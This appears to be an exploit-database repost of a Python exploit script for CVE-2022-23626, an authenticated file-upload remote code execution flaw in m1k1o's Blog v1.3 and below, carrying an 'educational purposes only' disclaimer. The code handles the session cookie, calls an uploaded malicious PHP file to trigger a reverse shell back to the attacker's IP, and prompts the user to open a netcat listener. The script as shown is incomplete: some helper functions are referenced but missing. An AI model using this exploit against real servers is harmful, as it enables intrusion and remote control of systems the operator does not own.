Exploits / Vulnerability Discovered : 2022-05-23 |
Type : webapps |
Platform : php
This exploit / vulnerability M1k1os blog v.10 remote code execution (rce) (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-01-06
# Exploit Author: Malte V
# Vendor Homepage: https://github.com/m1k1o/blog
# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
# Version: 1.3 and below
# Tested on: Linux
# CVE : CVE-2022-23626
import argparse
import json
import re
from base64 import b64encode
import requests as req
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')
parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)
parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',
required=False)
parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,
required=False)
parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,
required=False)
parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)
parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)
def get_cookie(complete_url):
global blog_cookie
cookie_header = {}
if not blog_cookie:
cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"
result = req.get(url=complete_url, headers=cookie_header)
if result.status_code == 200:
blog_cookie = result.cookies.get_dict()['PHPSESSID']
print(f'[+] Found PHPSESSID: {blog_cookie}')
grep_csrf(result)
def call_malicious_php(file_name):
global header
complete_url = f"{url}/data/i/{file_name}"
print('[*] Calling reverse shell')
result = req.get(url=complete_url)
def check_reverse_shell():
yes = {'yes', 'y', 'ye', ''}
no = {'no', 'n'}
choice = input("Have you got an active netcat listener (y/Y or n/N): ")
if choice in yes:
return True
elif choice in no:
print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")
return False